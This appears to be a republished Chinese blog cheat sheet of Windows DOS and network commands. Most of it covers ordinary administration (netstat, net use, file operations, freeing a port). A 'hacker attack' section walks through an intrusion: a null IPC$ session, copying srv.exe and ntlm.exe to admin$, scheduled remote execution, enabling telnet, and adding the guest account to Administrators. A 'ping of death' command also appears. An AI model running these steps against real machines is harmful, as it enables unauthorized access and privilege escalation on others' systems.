zoukankan      html  css  js  c++  java
  • Windows 常见DOS命令

    1. 查看网络连接及路由状况

    netstat -a                 查看开启了哪些端口,常用netstat -an
    netstat -n                  查看端口的网络连接情况,常用netstat -an
    netstat -v                  查看正在进行的工作
    netstat -p 协议名      查看某协议使用情况(查看tcp/ip协议使用情况)    例:netstat -p tcq/ip
    netstat -s                  查看正在使用的所有协议使用情况

    nbtstat -A ip             查看对方最近登陆的用户名(对方136到139其中一个端口要打开)
    finger username @host    查看最近有哪些用户登陆

    ipconfig                    查看本地ip地址,参数“/all”显示全部配置信息
    ping ip(或域名)         向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    ping -t -l 65550 ip   死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    tracert -参数 ip         跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    route print               显示出IP路由,将主要显示网络地址Network addres,子网掩码

    mem                        查看cpu使用情况
    tlist -t                       以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    kill -F 进程名            加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

     

    2. 建立网络连接(磁盘映射)与资源共享

    net use \ipipc$ " " /user:" "                    建立IPC空链接
    net use \ipipc$ "密码" /user:"用户名"      建立IPC非空链接
    net use h: \ipc$ "密码" /user:"用户名"     直接登陆后映射对方C:到本地为H:
    net use h: \ipc$                                       登陆后映射对方C:到本地为H:
    net use \ipipc$ /del                                删除IPC链接
    net use h: /del                                           删除映射对方到本地的为H:的映射

    net use i: "\ipsharefolder" "password" /user:"domainusername"   磁盘映射,将共享目录映射为本地磁盘i

    net user                                                    查看有哪些用户
    net user 帐户名                                          查看帐户的属性
    net user 用户名 密码 /add                     建立用户
    net user guest 12345                                用guest用户登陆后用将密码改为12345
    net user guest /active:yes                         激活guest用户
    net localgroup administrators 用户名 /add        把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

    net password 密码                                     更改系统登陆密码

    net time \目标ip                                       查看对方时间
    net time \目标ip /set                                设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

    net view                                                     查看本地局域网内开启了哪些共享
    net view \ip                                              查看对方局域网内开启了哪些共享

    net share                                                   查看本地开启的共享
    net share ipc$                                           开启ipc$共享
    net share ipc$ /del                                    删除ipc$共享
    net share c$ /del                                       删除C:共享

    telnet ip                                                    端口 远和登陆服务器,默认端口为23 
    open ip                                                     连接到IP(属telnet登陆后的命令) 
    telnet                                                        在本机上直接键入telnet 将进入本机的telnet

    tftp -i 对方IP put c:srv.exe                       登陆后,上传本地c:server.exe至主机
    tftp -i 自己IP get srv.exe c:srv.exe           登陆后,将"IP"的srv.exe下载到目标主机c:srv.exe
                                                              参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    ftp ip 端口                                                用于上传文件至服务器或进行文件操作,默认端口为21。
                                                                     参数: bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

    3. 文件操作

    xcopy 要复制的文件或目录树 目标地址目录名      复制文件和目录树,用参数/Y将不提示覆盖相同文件
    copy 路径文件名1 路径文件名2 /y                      复制文件1到指定的目录为文件2,用参数/y表示确认
    copy c:srv.exe \ipadmin$                                   复制本地c:srv.exe到对方的admin下
    copy \ipadmin$srv.exe c:                                  复制对方admini$共享下的srv.exe文件至本地C:
    cppy 1.jpg/b+2.txt/a 3.jpg                                     将2.txt的内容藏身到1.jpg中生成3.jpg新的文件
                                                                               注:2.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

    replace 源文件                                                      要替换文件的目录 替换文件
    move 要移动的盘符路径文件名 移动后的路径文件名              移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    del /S /Q 目录 或 rmdir /s /Q                                 删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
    del -F 文件名                            加-F参数后就可删除只读文件
                                      /AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件
                                     /A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
                                     例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

    md 目录名                                创建目录
    dir                                            查看文件
                                                    参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
    tree                                          以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
    ren     原文件名 新文件名          重命名文件名
    type   文件名                            显示文本文件的内容
    more 文件名                             逐屏显示输出文件
    find   文件名                             查找某文件

    fc 1.txt 2.txt>3.txt                    对比二个文件并把不同之处输出到3.txt文件中,"> "和"> >" 是重定向命令
    echo hello>d:1.txt ;                写入文本到指定文件(如果文件存在则替换)
    findstr "hello" 1.txt                  在1.txt文件中寻找字符串hello

     

    场景一、杀掉占用指定端口的进程

      1)查看指定端口占用情况:  netstat -ano|findstr "8080"          TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       10844

      2)查看PID对应进程:          tasklist|findstr "10844"                 java.exe                     10844 Console                    1    486,664 K

           3)结束该进程:                   taskkill /f /t /im java.exe

    场景二、黑客攻击

      Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源。
      IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,远程管理和查看计算机的共享资源。对方机器必须开了ipc$共享,否则你是连接不上的,连接成功后可通过139,445端口实现对共享文件/打印机的访问。由于Telnet服务默认是关闭的,可以在IPC连接成功后启动Telnet服务。

      1)连接对方主机:                                   net use \127.0.0.1ipc$ "" /user:"admintitrators" 

      2)在对方主机中运行程序

      复制文件到对方主机:                       copy srv.exe \127.0.0.1admin$     (这里的admin$指C:WINNTSystem32)
      查看时间:                                        net time \127.0.0.1 当前时间为:11:00
      用at命令启动srv.exe:                       at \127.0.0.1 11:05 srv.exe

      3)使用telnet远程登录对方主机

    复制ntlm.exe到对方主机:                copy ntlm.exe \127.0.0.1admin$
    进入admin目录执行ntlm程序:         ntlm
    打开对方telnet服务:                        net start telnet
    使用telnet登录对方机器:     telnet 127.0.0.1

      4)修改guest 用户权限

    激活guest 用户: net user guest /active:yes
    修改guest 用户密码: net user guest 123456
    将guest 用户加入Administrator组: net localgroup Administrators guest /add

      5)退出连接:                                          net use \127.0.0.1ipc$ /del

     常见错误号:

    错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限; 
    错误号51,Windows无法找到网络路径:网络有问题; 
    错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 
    错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 
    错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 
    错误号1326,未知的用户名或错误密码:原因很明显了; 
    错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动; 
    错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码

    参考原文:   http://www.cnblogs.com/lhws/p/4024208.html
          http://www.cnblogs.com/chinahbzm/articles/1423875.html

  • 相关阅读:
    我爱Java系列之---【SpringBoot打成war包部署】
    279. Perfect Squares
    矩阵dfs--走回路
    112. Path Sum
    542. 01 Matrix
    106. Construct Binary Tree from Inorder and Postorder Traversal
    105. Construct Binary Tree from Preorder and Inorder Traversal
    Invert Binary Tree
    563 Binary Tree Tilt
    145 Binary Tree Postorder Traversal
  • 原文地址:https://www.cnblogs.com/anxiao/p/6860559.html
Copyright © 2011-2022 走看看